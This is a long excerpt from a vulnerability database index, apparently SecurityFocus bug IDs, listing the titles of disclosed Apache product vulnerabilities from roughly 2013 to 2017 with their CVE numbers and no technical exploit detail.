14042| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
14043| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
14044| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
14045| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
14046| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
14047| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
14048| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
14049| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
14050| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
14051| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
14052| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
14053| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
14054| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
14055| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
14056| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
14057| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
14058| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
14059| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
14060| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
14061| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
14062| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
14063| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
14064| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
14065| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
14066| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
14067| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
14068| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
14069| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
14070| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
14071| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
14072| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
14073| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
14074| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
14075| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
14076| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
14077| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
14078| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
14079| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
14080| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
14081| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
14082| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
14083| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
14084| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
14085| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
14086| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
14087| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
14088| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
14089| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
14090| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
14091| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
14092| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
14093| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
14094| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
14095| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
14096| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
14097| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
14098| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
14099| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
14100| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
14101| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
14102| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
14103| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
14104| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
14105| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
14106| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
14107| [95675] Apache Struts Remote Code Execution Vulnerability
14108| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
14109| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
14110| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
14111| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
14112| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
14113| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
14114| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
14115| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
14116| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
14117| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
14118| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
14119| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
14120| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
14121| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
14122| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
14123| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
14124| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
14125| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
14126| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
14127| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
14128| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
14129| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
14130| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
14131| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
14132| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
14133| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
14134| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
14135| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
14136| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
14137| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
14138| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
14139| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
14140| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
14141| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
14142| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
14143| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
14144| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
14145| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
14146| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
14147| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
14148| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
14149| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
14150| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
14151| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
14152| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
14153| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
14154| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
14155| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
14156| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
14157| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
14158| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
14159| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
14160| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
14161| [91736] Apache XML-RPC Multiple Security Vulnerabilities
14162| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
14163| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
14164| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
14165| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
14166| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
14167| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
14168| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
14169| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
14170| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
14171| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
14172| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
14173| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
14174| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
14175| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
14176| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
14177| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
14178| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
14179| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
14180| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
14181| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
14182| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
14183| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
14184| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
14185| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
14186| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
14187| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
14188| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
14189| [90482] Apache CVE-2004-1387 Local Security Vulnerability
14190| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
14191| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
14192| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
14193| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
14194| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
14195| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
14196| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
14197| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
14198| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
14199| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
14200| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
14201| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
14202| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
14203| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14204| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14205| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14206| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14207| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14208| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14209| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14210| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14211| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14212| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14213| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14214| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
14215| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14216| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14217| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14218| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14219| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14220| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14221| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14222| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14223| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14224| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14225| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14226| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14227| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14228| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
14229| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14230| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14231| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14232| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14233| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14234| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14235| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14236| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14237| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14238| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14239| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14240| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14241| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
14242| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14243| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14244| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14245| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14246| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14247| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14248| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14249| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14250| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14251| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
14252| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
14253| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
14254| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
14255| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
14256| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
14257| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
14258| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
14259| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
14260| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
14261| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
14262| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
14263| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
14264| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
14265| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
14266| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
14267| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
14268| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
14269| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
14270| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
14271| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
14272| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
14273| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
14274| [76933] Apache James Server Unspecified Command Execution Vulnerability
14275| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
14276| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
14277| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
14278| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
14279| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
14280| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
14281| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
14282| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
14283| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
14284| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
14285| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
14286| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
14287| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
14288| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
14289| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
14290| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
14291| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
14292| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
14293| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
14294| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
14295| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
14296| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
14297| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
14298| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
14299| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
14300| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
14301| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
14302| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
14303| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
14304| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
14305| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
14306| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
14307| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
14308| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
14309| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
14310| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
14311| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
14312| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
14313| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
14314| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
14315| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
14316| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
14317| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
14318| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
14319| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
14320| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
14321| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
14322| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
14323| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
14324| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
14325| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
14326| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
14327| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
14328| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
14329| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
14330| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
14331| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
14332| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
14333| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
14334| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
14335| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
14336| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
14337| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
14338| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
14339| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
14340| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
14341| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
14342| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
14343| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
14344| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
14345| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
14346| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
14347| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
14348| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
14349| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
14350| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
14351| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
14352| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
14353| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
14354| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
14355| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
14356| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
14357| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
14358| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
14359| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
14360| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
14361| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
14362| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
14363| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
14364| [68229] Apache Harmony PRNG Entropy Weakness
14365| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
14366| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
14367| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
14368| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
14369| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
14370| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
14371| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
14372| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
14373| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
14374| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
14375| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
14376| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
14377| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
14378| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
14379| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
14380| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
14381| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
14382| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
14383| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
14384| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
14385| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
14386| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
14387| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
14388| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
14389| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
14390| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
14391| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
14392| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
14393| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
14394| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
14395| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
14396| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
14397| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
14398| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
14399| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
14400| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
14401| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
14402| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
14403| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
14404| [64780] Apache CloudStack Unauthorized Access Vulnerability
14405| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
14406| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
14407| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
14408| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
14409| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
14410| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
14411| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
14412| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
